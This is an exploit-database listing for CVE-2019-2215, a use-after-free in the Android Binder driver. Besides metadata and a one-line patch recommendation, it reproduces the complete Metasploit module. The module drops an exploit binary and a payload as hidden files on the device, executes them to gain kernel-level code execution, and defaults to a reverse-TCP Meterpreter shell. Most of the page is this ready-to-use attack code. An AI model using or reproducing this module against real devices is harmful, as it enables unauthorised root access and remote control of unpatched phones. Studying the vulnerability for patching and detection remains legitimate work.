header-logo
Suggest Exploit
vendor:
Android
by:
Jann Horn, Maddie Stone, grant-h, timwr
7.8
CVSS
HIGH
Use-After-Free
416
CWE
Product Name: Android
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2019-2215
CPE: o:google:android
Metasploit: https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp3-cve-2019-2215/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp2-cve-2019-2215/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp5-cve-2019-2215/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2019-2215/https://www.rapid7.com/db/vulnerabilities/debian-cve-2019-2215/https://www.rapid7.com/db/modules/exploit/android/local/binder_uaf/
Other Scripts:
Platforms Tested: Android, Linux
2019

Android Binder Use-After-Free Exploit

This module exploits a use-after-free vulnerability in the Android Binder driver. By sending specially crafted binder transactions, an attacker can corrupt the kernel memory and gain arbitrary code execution in the context of the kernel. This vulnerability was assigned CVE-2019-2215.

Mitigation:

Apply the latest security updates provided by the vendor.
Source

Exploit-DB raw data:

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Common
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super( update_info( info, {
        'Name'          => "Android Binder Use-After-Free Exploit",
        'Description'   => %q{
        },
        'License'       => MSF_LICENSE,
        'Author'        => [
            'Jann Horn',    # discovery and exploit
            'Maddie Stone', # discovery and exploit
            'grant-h',      # Qu1ckR00t
            'timwr',        # metasploit module
        ],
        'References'    => [
            [ 'CVE', '2019-2215' ],
            [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1942' ],
            [ 'URL', 'https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/' ],
            [ 'URL', 'https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c' ],
        ],
        'DisclosureDate' => "Sep 26 2019",
        'SessionTypes'   => [ 'meterpreter' ],
        'Platform'       => [ "android", "linux" ],
        'Arch'           => [ ARCH_AARCH64 ],
        'Targets'        => [[ 'Auto', {} ]],
        'DefaultOptions' =>
        {
          'PAYLOAD'      => 'linux/aarch64/meterpreter/reverse_tcp',
          'WfsDelay'     => 5,
        },
        'DefaultTarget' => 0,
      }
    ))
  end

  def upload_and_chmodx(path, data)
    write_file path, data
    chmod(path)
    register_file_for_cleanup(path)
  end

  def exploit
    local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2019-2215", "exploit" )
    exploit_data = File.read(local_file, {:mode => 'rb'})

    workingdir = session.fs.dir.getwd
    exploit_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
    upload_and_chmodx(exploit_file, exploit_data)
    payload_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
    upload_and_chmodx(payload_file, generate_payload_exe)

    print_status("Executing exploit '#{exploit_file}'")
    result = cmd_exec("echo '#{payload_file} &' | #{exploit_file}")
    print_status("Exploit result:\n#{result}")
  end
end

Navigation

Suggest Exploit

Services By CQR